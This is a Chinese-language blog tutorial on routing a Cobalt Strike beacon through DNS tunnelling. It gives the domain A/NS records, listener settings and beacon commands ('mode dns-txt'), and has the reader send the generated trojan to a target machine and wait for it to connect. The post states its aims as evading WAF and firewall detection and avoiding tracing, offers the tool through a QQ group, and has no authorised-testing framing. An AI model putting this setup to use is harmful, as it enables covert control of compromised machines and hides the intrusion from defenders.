DNS隧道技術可以解決運控木馬無法上線的問題，waf，防火牆對tcp，http，https等埠有流量檢測，這個時候我們就可以使用隧道技術，讓cs木馬走DNS隧道，不僅可以檢測不到而且也是一種反溯源的方法。

cs使用DNS反溯源—推薦部落格—》反溯源

我這個只是講如何通過CDN上線cs運控木馬，不是我不想跟上面的師傅（反溯源）一樣，而是在註冊免費國外域名的時候出現了freenom網站不讓新使用者註冊，所以使用不了，這個我到時候再出一篇部落格來解決這個問題。

需要：

雲伺服器

域名

域名解析

在你自己的伺服器上面開啟UDP的53埠

一.DNS配置問題

首先你需要一個域名（freenom網站可以免費註冊，但是最近不知道為什麼註冊不了），我的是阿里雲的。

DNS解析在你購買的域名的網站配置

A記錄->cs主機記錄->CS伺服器IP

NS記錄->ns1主機記錄->上個A記錄地址（cs.域名（如：cs.baidu.com））

NS記錄->ns2主機記錄->上個A記錄地址（cs.域名（如：cs.baidu.com））

這裡的ns2和ns1主機名是A的主機記錄+域名：cs.域名（如：cs.baidu.com）

驗證dns解析是否成功

開啟命令列輸入：

C:\Users\Lenovo>nslookup cs.t****n.cool
伺服器: UnKnown
Address: fe80::1

非權威應答:
名稱: cs.t***n.cool
Address: 42.***.***.184

C:\Users\Lenovo>nslookup ns1.t***n.cool
伺服器: UnKnown
Address: fe80::1

非權威應答:
名稱: ns1.t***n.cool
Address: 0.0.0.0

C:\Users\Lenovo>nslookup ns2.t****.cool
DNS request timed out.
timeout was 2 seconds.
伺服器: UnKnown
Address: fe80::1

非權威應答:
名稱: ns2.t***n.cool
Address: 0.0.0.0

配置錯誤的師傅請加入qq群：184324009

二.cs配置

我的cs是4.4版本的，需要工具的師傅請加入qq群聊：184324009

關於cs的配置我會出一篇cs配置教學

點選進入監聽模式

點選新增

設定為

dns地址為NS記錄如：ns1.xxxx.com

dns地址(Stager)：為解析A記錄 cs.xxx.com

DNS解析伺服器為：你cs伺服器ip

接下來生成運控木馬，要選擇下面這個，上面的接收不到

然後發目標機裡面執行，坐等上線，上線時間與伺服器解析網路掛鉤

上線後，會得到一個黑框框，這個時候輸入一些命令就可以了

beacon> checkin
[] Tasked beacon to checkin
beacon> mode dns-txt
[+] data channel set to DNS-TXT
[+] host called home, sent: 8 bytes
就可以正常

歡迎各位師傅加入qq群討論，（群主有時間會直播解答疑問）
qq群：184324009
轉載於up主自己的部落格：https://www.taoyuan.cool/post-10.html